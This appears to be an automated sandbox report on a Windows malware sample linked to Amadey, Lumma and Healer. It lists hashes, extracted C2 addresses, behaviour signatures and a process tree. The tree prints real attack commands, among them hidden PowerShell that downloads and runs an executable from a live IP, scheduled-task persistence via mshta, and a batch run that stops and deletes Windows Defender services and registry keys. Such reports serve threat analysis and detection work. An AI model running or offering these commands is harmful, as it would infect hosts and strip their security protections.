Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    29/03/2025, 14:09

General

  • Target

    2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe

  • Size

    938KB

  • MD5

    fab7377d0c225be7110b381bbbe53d2e

  • SHA1

    3096dd62d5f3bcfaec2350e2e7484ddf4fea17b1

  • SHA256

    402dfdbcdac8266fdde22e6a8ecc3ad6fd795aaacda7620c4b6ecd615864dd88

  • SHA512

    89769c0cda927e2318ebf1b6b738040f4b723d05923194a515bdf406afd47845cd0f03e3828079bbcd4a81eabc20cd1a4ebce7b756987e0e49d31ae55c2714f5

  • SSDEEP

    24576:sqDEvCTbMWu7rQYlBQcBiT6rprG8a0ku:sTvC/MTQYxsWR7a0k

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://176.113.115.7/mine/random.exe

Extracted

Family

amadey

Version

5.21

Botnet

092155

C2

http://176.113.115.6

Attributes
  • install_dir

    bb556cff4a

  • install_file

    rapes.exe

  • strings_key

    a131b127e996a898cd19ffb2d92e481b

  • url_paths

    /Ni9kiput/index.php

rc4.plain

Extracted

Family

lumma

C2

https://advennture.top/GKsiio

https://byteplusx.digital/aXweAX

https://travewlio.shop/ZNxbHi

https://skynetxc.live/AksoPA

https://pixtreev.run/LkaUz

https://targett.top/dsANGt

https://sparkiob.digital/KeASUp

https://appgridn.live/LEjdAK

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • Detects Healer an antivirus disabler dropper 2 IoCs
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Healer

    Healer an antivirus disabler dropper.

  • Healer family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 1 IoCs
  • Modifies Windows Defender notification settings 3 TTPs 2 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 14 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file 25 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 28 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Executes dropped EXE 45 IoCs
  • Identifies Wine through registry keys 2 TTPs 14 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Windows security modification 2 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • AutoIT Executable 2 IoCs

    AutoIT scripts compiled to PE executables.

  • Enumerates processes with tasklist 1 TTPs 2 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 14 IoCs
  • Suspicious use of SetThreadContext 4 IoCs
  • Drops file in Program Files directory 46 IoCs
  • Drops file in Windows directory 15 IoCs
  • Launches sc.exe 38 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 2 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 26 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
    "C:\Users\Admin\AppData\Local\Temp\2025-03-29_fab7377d0c225be7110b381bbbe53d2e_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2428
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2140
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /create /tn OjCESma0GQ6 /tr "mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta" /sc minute /mo 25 /ru "Admin" /f
        3⤵
        • System Location Discovery: System Language Discovery
        • Scheduled Task/Job: Scheduled Task
        PID:1748
    • C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\mWP0iAltw.hta
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:2056
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'QCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        3⤵
        • Blocklisted process makes network request
        • Command and Scripting Interpreter: PowerShell
        • Downloads MZ/PE file
        • Loads dropped DLL
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:3060
        • C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE
          "C:\Users\Admin\AppData\Local\TempQCAHOJQJQYNNUIN2TPH85FFPA55XHC74.EXE"
          4⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Loads dropped DLL
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of FindShellTrayWindow
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
            "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
            5⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Downloads MZ/PE file
            • Checks BIOS information in registry
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Loads dropped DLL
            • Adds Run key to start application
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:860
            • C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe
              "C:\Users\Admin\AppData\Local\Temp\10345240101\EPTwCQd.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of WriteProcessMemory
              PID:1236
              • C:\Windows\system32\WerFault.exe
                C:\Windows\system32\WerFault.exe -u -p 1236 -s 28
                7⤵
                • Loads dropped DLL
                PID:1844
            • C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe
              "C:\Users\Admin\AppData\Local\Temp\10358260101\Rm3cVPI.exe"
              6⤵
              • Executes dropped EXE
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2284
            • C:\Users\Admin\AppData\Local\Temp\10362200101\e26b64a145.exe
              "C:\Users\Admin\AppData\Local\Temp\10362200101\e26b64a145.exe"
              6⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Writes to the Master Boot Record (MBR)
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious behavior: EnumeratesProcesses
              PID:1876
            • C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe
              "C:\Users\Admin\AppData\Local\Temp\10367460101\apple.exe"
              6⤵
              • Executes dropped EXE
              • Loads dropped DLL
              • System Location Discovery: System Language Discovery
              • Suspicious use of WriteProcessMemory
              PID:696
              • C:\Users\Admin\AppData\Local\Temp\22.exe
                "C:\Users\Admin\AppData\Local\Temp\22.exe"
                7⤵
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:1196
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\32B4.tmp\32B5.tmp\32B6.bat C:\Users\Admin\AppData\Local\Temp\22.exe"
                  8⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2420
                  • C:\Users\Admin\AppData\Local\Temp\22.exe
                    "C:\Users\Admin\AppData\Local\Temp\22.exe" go
                    9⤵
                    • Executes dropped EXE
                    • Suspicious behavior: CmdExeWriteProcessMemorySpam
                    • Suspicious use of WriteProcessMemory
                    PID:2484
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\3302.tmp\3303.tmp\3304.bat C:\Users\Admin\AppData\Local\Temp\22.exe go"
                      10⤵
                      • Drops file in Program Files directory
                      • Suspicious use of WriteProcessMemory
                      PID:2080
                      • C:\Windows\system32\sc.exe
                        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
                        11⤵
                        • Launches sc.exe
                        PID:2428
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:3020
                      • C:\Windows\system32\timeout.exe
                        timeout /t 1
                        11⤵
                        • Delays execution with timeout.exe
                        PID:2564
                      • C:\Windows\system32\sc.exe
                        sc stop ddrver
                        11⤵
                        • Launches sc.exe
                        PID:1748
                      • C:\Windows\system32\sc.exe
                        sc start ddrver
                        11⤵
                        • Launches sc.exe
                        PID:2140
                      • C:\Windows\system32\takeown.exe
                        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2528
                      • C:\Windows\system32\icacls.exe
                        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
                        11⤵
                        • Possible privilege escalation attempt
                        • Modifies file permissions
                        PID:2352
                      • C:\Windows\system32\sc.exe
                        sc stop "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2252
                      • C:\Windows\system32\sc.exe
                        sc delete "WinDefend"
                        11⤵
                        • Launches sc.exe
                        PID:2332
                      • C:\Windows\system32\reg.exe
                        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
                        11⤵
                          PID:2600
                        • C:\Windows\system32\sc.exe
                          sc stop "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2608
                        • C:\Windows\system32\sc.exe
                          sc delete "MDCoreSvc"
                          11⤵
                          • Launches sc.exe
                          PID:2948
                        • C:\Windows\system32\reg.exe
                          reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
                          11⤵
                            PID:3024
                          • C:\Windows\system32\sc.exe
                            sc stop "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:3068
                          • C:\Windows\system32\sc.exe
                            sc delete "WdNisSvc"
                            11⤵
                            • Launches sc.exe
                            PID:2260
                          • C:\Windows\system32\reg.exe
                            reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
                            11⤵
                              PID:2964
                            • C:\Windows\system32\sc.exe
                              sc stop "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:2464
                            • C:\Windows\system32\sc.exe
                              sc delete "Sense"
                              11⤵
                              • Launches sc.exe
                              PID:2560
                            • C:\Windows\system32\reg.exe
                              reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
                              11⤵
                                PID:2828
                              • C:\Windows\system32\sc.exe
                                sc stop "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:332
                              • C:\Windows\system32\sc.exe
                                sc delete "wscsvc"
                                11⤵
                                • Launches sc.exe
                                PID:3028
                              • C:\Windows\system32\reg.exe
                                reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
                                11⤵
                                  PID:2816
                                • C:\Windows\system32\sc.exe
                                  sc stop "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:2992
                                • C:\Windows\system32\sc.exe
                                  sc delete "SgrmBroker"
                                  11⤵
                                  • Launches sc.exe
                                  PID:1724
                                • C:\Windows\system32\reg.exe
                                  reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
                                  11⤵
                                    PID:1980
                                  • C:\Windows\system32\sc.exe
                                    sc stop "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2748
                                  • C:\Windows\system32\sc.exe
                                    sc delete "SecurityHealthService"
                                    11⤵
                                    • Launches sc.exe
                                    PID:2928
                                  • C:\Windows\system32\reg.exe
                                    reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
                                    11⤵
                                      PID:2720
                                    • C:\Windows\system32\sc.exe
                                      sc stop "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2724
                                    • C:\Windows\system32\sc.exe
                                      sc delete "webthreatdefsvc"
                                      11⤵
                                      • Launches sc.exe
                                      PID:2984
                                    • C:\Windows\system32\reg.exe
                                      reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
                                      11⤵
                                        PID:2868
                                      • C:\Windows\system32\sc.exe
                                        sc stop "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2812
                                      • C:\Windows\system32\sc.exe
                                        sc delete "webthreatdefusersvc"
                                        11⤵
                                        • Launches sc.exe
                                        PID:2976
                                      • C:\Windows\system32\reg.exe
                                        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
                                        11⤵
                                          PID:2692
                                        • C:\Windows\system32\sc.exe
                                          sc stop "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:2712
                                        • C:\Windows\system32\sc.exe
                                          sc delete "WdNisDrv"
                                          11⤵
                                          • Launches sc.exe
                                          PID:3000
                                        • C:\Windows\system32\reg.exe
                                          reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
                                          11⤵
                                            PID:2488
                                          • C:\Windows\system32\sc.exe
                                            sc stop "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1088
                                          • C:\Windows\system32\sc.exe
                                            sc delete "WdBoot"
                                            11⤵
                                            • Launches sc.exe
                                            PID:1788
                                          • C:\Windows\system32\reg.exe
                                            reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
                                            11⤵
                                              PID:1992
                                            • C:\Windows\system32\sc.exe
                                              sc stop "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:656
                                            • C:\Windows\system32\sc.exe
                                              sc delete "WdFilter"
                                              11⤵
                                              • Launches sc.exe
                                              PID:1856
                                            • C:\Windows\system32\reg.exe
                                              reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
                                              11⤵
                                                PID:2732
                                              • C:\Windows\system32\sc.exe
                                                sc stop "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1008
                                              • C:\Windows\system32\sc.exe
                                                sc delete "SgrmAgent"
                                                11⤵
                                                • Launches sc.exe
                                                PID:1564
                                              • C:\Windows\system32\reg.exe
                                                reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
                                                11⤵
                                                  PID:856
                                                • C:\Windows\system32\sc.exe
                                                  sc stop "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:1896
                                                • C:\Windows\system32\sc.exe
                                                  sc delete "MsSecWfp"
                                                  11⤵
                                                  • Launches sc.exe
                                                  PID:356
                                                • C:\Windows\system32\reg.exe
                                                  reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
                                                  11⤵
                                                    PID:2896
                                                  • C:\Windows\system32\sc.exe
                                                    sc stop "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:1716
                                                  • C:\Windows\system32\sc.exe
                                                    sc delete "MsSecFlt"
                                                    11⤵
                                                    • Launches sc.exe
                                                    PID:2768
                                                  • C:\Windows\system32\reg.exe
                                                    reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
                                                    11⤵
                                                      PID:836
                                                    • C:\Windows\system32\sc.exe
                                                      sc stop "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1244
                                                    • C:\Windows\system32\sc.exe
                                                      sc delete "MsSecCore"
                                                      11⤵
                                                      • Launches sc.exe
                                                      PID:1944
                                                    • C:\Windows\system32\reg.exe
                                                      reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
                                                      11⤵
                                                        PID:2924
                                                      • C:\Windows\system32\schtasks.exe
                                                        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
                                                        11⤵
                                                          PID:2412
                                                        • C:\Windows\system32\schtasks.exe
                                                          schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
                                                          11⤵
                                                            PID:2932
                                                          • C:\Windows\system32\schtasks.exe
                                                            schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
                                                            11⤵
                                                              PID:2916
                                                            • C:\Windows\system32\schtasks.exe
                                                              schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
                                                              11⤵
                                                                PID:2312
                                                              • C:\Windows\system32\sc.exe
                                                                sc stop ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:2796
                                                              • C:\Windows\system32\sc.exe
                                                                sc delete ddrver
                                                                11⤵
                                                                • Launches sc.exe
                                                                PID:2240
                                                    • C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10368090101\hYjiwV0.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      PID:2676
                                                      • C:\Windows\system32\WerFault.exe
                                                        C:\Windows\system32\WerFault.exe -u -p 2676 -s 44
                                                        7⤵
                                                        • Loads dropped DLL
                                                        PID:2656
                                                    • C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe
                                                      "C:\Users\Admin\AppData\Local\Temp\10368160101\amnew.exe"
                                                      6⤵
                                                      • Executes dropped EXE
                                                      • Loads dropped DLL
                                                      • Drops file in Windows directory
                                                      • System Location Discovery: System Language Discovery
                                                      • Suspicious use of FindShellTrayWindow
                                                      PID:2940
                                                      • C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
                                                        7⤵
                                                        • Downloads MZ/PE file
                                                        • Executes dropped EXE
                                                        • Loads dropped DLL
                                                        • Adds Run key to start application
                                                        • System Location Discovery: System Language Discovery
                                                        • Modifies system certificate store
                                                        PID:1924
                                                        • C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2876
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2876 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:2176
                                                        • C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2752
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2752 -s 44
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:2976
                                                        • C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10028410101\alex1dskfmdsf.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2320
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2320 -s 36
                                                            9⤵
                                                            • Loads dropped DLL
                                                            PID:1544
                                                        • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          • Loads dropped DLL
                                                          • System Location Discovery: System Language Discovery
                                                          PID:1200
                                                          • C:\Users\Admin\AppData\Local\Temp\is-0GB6P.tmp\Bell_Setup16.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-0GB6P.tmp\Bell_Setup16.tmp" /SL5="$50186,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe"
                                                            9⤵
                                                            • Executes dropped EXE
                                                            • Loads dropped DLL
                                                            PID:1196
                                                            • C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                              10⤵
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2428
                                                              • C:\Users\Admin\AppData\Local\Temp\is-T71L6.tmp\Bell_Setup16.tmp
                                                                "C:\Users\Admin\AppData\Local\Temp\is-T71L6.tmp\Bell_Setup16.tmp" /SL5="$60186,1695194,421888,C:\Users\Admin\AppData\Local\Temp\10041600101\Bell_Setup16.exe" /VERYSILENT
                                                                11⤵
                                                                • Executes dropped EXE
                                                                • System Location Discovery: System Language Discovery
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of FindShellTrayWindow
                                                                PID:332
                                                                • C:\Windows\SysWOW64\regsvr32.exe
                                                                  "regsvr32.exe" /s /i:INSTALL "C:\Users\Admin\AppData\Roaming\\1wlanapi.ocx"
                                                                  12⤵
                                                                  • System Location Discovery: System Language Discovery
                                                                  PID:2816
                                                        • C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10042990101\bot.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:1020
                                                        • C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe
                                                          "C:\Users\Admin\AppData\Local\Temp\10043020101\jokererer.exe"
                                                          8⤵
                                                          • Executes dropped EXE
                                                          PID:2764
                                                          • C:\Windows\system32\WerFault.exe
                                                            C:\Windows\system32\WerFault.exe -u -p 2764 -s 28
                                                            9⤵
                                                              PID:1152
                                                          • C:\Users\Admin\AppData\Local\Temp\10044030101\40608a0434.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10044030101\40608a0434.exe"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:2716
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10044030101\40608a0434.exe"
                                                              9⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2072
                                                          • C:\Users\Admin\AppData\Local\Temp\10044040101\9e2f54c6a0.exe
                                                            "C:\Users\Admin\AppData\Local\Temp\10044040101\9e2f54c6a0.exe"
                                                            8⤵
                                                            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                            • Checks BIOS information in registry
                                                            • Executes dropped EXE
                                                            • Identifies Wine through registry keys
                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                            • Suspicious use of SetThreadContext
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:284
                                                            • C:\Users\Admin\AppData\Local\Temp\svchost015.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\10044040101\9e2f54c6a0.exe"
                                                              9⤵
                                                              • Downloads MZ/PE file
                                                              • Executes dropped EXE
                                                              • System Location Discovery: System Language Discovery
                                                              PID:468
                                                      • C:\Users\Admin\AppData\Local\Temp\10369180101\9d29b3b398.exe
                                                        "C:\Users\Admin\AppData\Local\Temp\10369180101\9d29b3b398.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • System Location Discovery: System Language Discovery
                                                        • Suspicious use of FindShellTrayWindow
                                                        • Suspicious use of SendNotifyMessage
                                                        PID:1196
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c schtasks /create /tn Xeqzfmaajt2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\OrOurZ3cN.hta" /sc minute /mo 25 /ru "Admin" /f
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2336
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /tn Xeqzfmaajt2 /tr "mshta C:\Users\Admin\AppData\Local\Temp\OrOurZ3cN.hta" /sc minute /mo 25 /ru "Admin" /f
                                                            8⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2792
                                                        • C:\Windows\SysWOW64\mshta.exe
                                                          mshta C:\Users\Admin\AppData\Local\Temp\OrOurZ3cN.hta
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Modifies Internet Explorer settings
                                                          PID:888
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GJPDHGVD3YBMZUO4VLINMVIQ6BUYJIMW.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
                                                            8⤵
                                                            • Blocklisted process makes network request
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Downloads MZ/PE file
                                                            • Loads dropped DLL
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2332
                                                            • C:\Users\Admin\AppData\Local\TempGJPDHGVD3YBMZUO4VLINMVIQ6BUYJIMW.EXE
                                                              "C:\Users\Admin\AppData\Local\TempGJPDHGVD3YBMZUO4VLINMVIQ6BUYJIMW.EXE"
                                                              9⤵
                                                              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                              • Checks BIOS information in registry
                                                              • Executes dropped EXE
                                                              • Identifies Wine through registry keys
                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                              • Suspicious behavior: EnumeratesProcesses
                                                              PID:1672
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        cmd /c ""C:\Users\Admin\AppData\Local\Temp\10369190121\am_no.cmd" "
                                                        6⤵
                                                        • System Location Discovery: System Language Discovery
                                                        PID:1000
                                                        • C:\Windows\SysWOW64\timeout.exe
                                                          timeout /t 2
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          • Delays execution with timeout.exe
                                                          PID:1656
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                          7⤵
                                                          • System Location Discovery: System Language Discovery
                                                          PID:2224
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
                                                            8⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • System Location Discovery: System Language Discovery
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:1700
